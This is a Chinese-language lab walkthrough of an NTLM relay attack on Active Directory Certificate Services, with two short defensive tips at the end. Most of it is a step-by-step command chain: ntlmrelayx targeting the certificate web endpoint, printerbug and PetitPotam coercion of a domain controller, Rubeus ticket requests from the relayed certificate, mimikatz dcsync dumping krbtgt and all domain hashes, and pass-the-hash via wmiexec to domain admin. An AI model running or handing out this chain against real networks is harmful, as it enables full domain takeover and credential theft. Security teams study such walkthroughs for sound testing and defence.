一、ADCS  Relay漏洞简介：

由于ADCS的http证书接口没有启用NTLM中继保护，因此其易受NTLM Relay攻击。而且Authorization HTTP 标头明确只允许通过 NTLM 身份验证，因此Kerberos协议无法使用。因此，攻击者可以利用NTLM Relay攻击ADCS证书服务

二、实验环境：

继上一篇文章所搭建的环境进行复现->

环境搭建篇

win2012 R2（域控）ip：192.168.136.100

win2012 R2（额外域控）ip：192.168.136.120（ADCS证书服务器）

win2008 R2（域内机器）ip：192.168.136.80

kali（攻击机）：192.168.136.144

三、复现过程：

win 2008 R2作为域内普通用户权限机器，注入票据、pth等操作都在此完成，以接近实际环境

1、定位ADCS证书服务器：

certutil -config - -ping

证书服务器web页面：

http://证书服务器域名/certsrv/certfnsh.asp

要更新为这个版本的impacket，具体用git pull 更新下，然后执行setup.py安装一遍就行了：

https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack

首先使用ntlmrelay.py开启监听：

python3 ntlmrelayx.py -t http://192.168.136.120/certsrv/certfnsh.asp -smb2support --adcs --template 'domain controller'

PS：需要将默认的http服务先关掉，否则会报错：address is already in use：

①使用打印机服务printerbug触发：

python3 printerbug.py 域名/域用户账号:域用户密码@域控ip 开启ntlmrelay监听的攻击机ip

②使用Petitpotam，利用FSRPC协议强连触发：

python3 Petitpotam.py -u 域用户账号 -p 域用户密码 -d 域名 开启ntlmrelay监听的攻击机ip 域控ip

然后ntlmrelay就会成功relay到base64编码的证书：

然后利用Rubeus.exe导入证书数据，获取tgt并注入：

Rubeus.exe asktgt /user:证书的user$ /certificate:base64编码的证书内容 /ppt

执行结果，成功获取到了TGT：

可以使用mimikatz导出krbtgt用户的hash：

kerberos::list       #查看kerberos票据

lsadump::dcsync /user:krbtgt /csv       #导出krbtgt用户的hash

以及可以dcsync导出域内所有hash：

lsadump::dcsync /all

或者手动注入票据，使用kekeo，然后再配合impacket利用：

获取到hash后可以进行pth到主域控：

wmiexec.exe -hashes :NTLMHash值 域名/用户名@目标IP可以看到ip信息为主域控ip，权限为域管

三、防御措施：

1、如果不需要，可以关闭证书服务的web端点。

2、可以将certsrv，该iis配置中的ntlm认证删除，这样就无法使用ntlm进行认证，也就阻止了relay攻击